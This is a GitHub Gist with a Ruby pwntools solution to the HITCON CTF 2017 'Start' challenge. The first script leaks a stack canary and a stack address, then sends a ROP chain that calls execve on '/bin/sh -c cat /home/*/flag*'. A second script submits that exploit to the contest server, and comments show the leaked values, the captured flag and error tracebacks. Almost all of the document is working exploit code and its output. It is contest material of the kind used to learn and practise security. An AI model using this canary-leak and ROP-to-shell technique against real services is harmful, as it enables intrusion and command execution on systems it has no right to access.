Created
November 7, 2017 08:18
-
-
Save Tosainu/e4bf02a96599ffc2e1cf93b831ead29a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'pwn' | |
| z = Sock.new '127.0.0.1', 31338 | |
| z.send 'A' * 0x19 | |
| z.recv 0x18 | |
| canary = u64(z.recv 8) & (~0xff) | |
| log.info "canary: #{canary.hex}" | |
| z.recv | |
| z.send 'A' * 0x40 | |
| z.recv 0x40 | |
| stack = u64((z.recv 6) + '\x00\x00') & 0x00ffffffffffff | |
| log.info "stack: #{stack.hex}" | |
| z.recv | |
| pop_rax_rdx_rbx_ret = 0x0047a6e6 | |
| pop_rdi_ret = 0x004005d5 | |
| pop_rsi_ret = 0x004017f7 | |
| syscall = 0x004003fc | |
| payload = '' | |
| payload += 'A' * 0x18 | |
| payload += p64 canary | |
| payload += 'A' * 8 | |
| payload += p64 pop_rax_rdx_rbx_ret | |
| payload += p64 59 | |
| payload += p64 0 | |
| payload += p64 0 | |
| payload += p64 pop_rdi_ret | |
| payload += p64 (stack - 0x100 + 0x38) | |
| payload += p64 pop_rsi_ret | |
| payload += p64 (stack - 0x100 + 0x18) | |
| payload += p64 syscall | |
| payload += p64 (stack - 0x100 + 0x38) | |
| payload += p64 (stack - 0x100 + 0x40) | |
| payload += p64 (stack - 0x100 + 0x48) | |
| payload += p64 0 | |
| payload += '/bin/sh'.ljust(8, "\x00") | |
| payload += '-c'.ljust(8, "\x00") | |
| payload += 'cat /home/*/flag*' | |
| z.write payload | |
| z.recv | |
| z.sendline 'exit' | |
| loop{puts z.recv} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # HITCON CTF 2017 Quals: Start | |
| require 'pwn' | |
| z = Sock.new '54.65.72.116', 31337 | |
| z.recvuntil '> ' | |
| z.write File.read('./exploit.rb') | |
| loop { | |
| puts z.recv | |
| } | |
| # $ bundle exec ruby exploit2.rb | |
| # [INFO] canary: 0xd1b454730f989000 | |
| # [INFO] stack: 0x7ffed8f31988 | |
| # | |
| # hitcon{thanks_for_using_pwntools-ruby:D} | |
| # server.rb:15:in `eval': EOFError (EOFError) | |
| # from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/sock.rb:84:in `recv_raw' | |
| # from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer' | |
| # from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/timer.rb:54:in `countdown' | |
| # from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer' | |
| # from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:38:in `recv' | |
| # from (eval):42:in `block in <main>' | |
| # from (eval):41:in `loop' | |
| # from (eval):41:in `<main>' | |
| # from server.rb:15:in `eval' | |
| # from server.rb:15:in `<main>' | |
| # /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:90:in `rescue in recv_raw': EOFError (EOFError) | |
| # from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:84:in `recv_raw' | |
| # from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer' | |
| # from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/timer.rb:54:in `countdown' | |
| # from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer' | |
| # from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:38:in `recv' | |
| # from exploit2.rb:10:in `block in <main>' | |
| # from exploit2.rb:9:in `loop' | |
| # from exploit2.rb:9:in `<main>' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment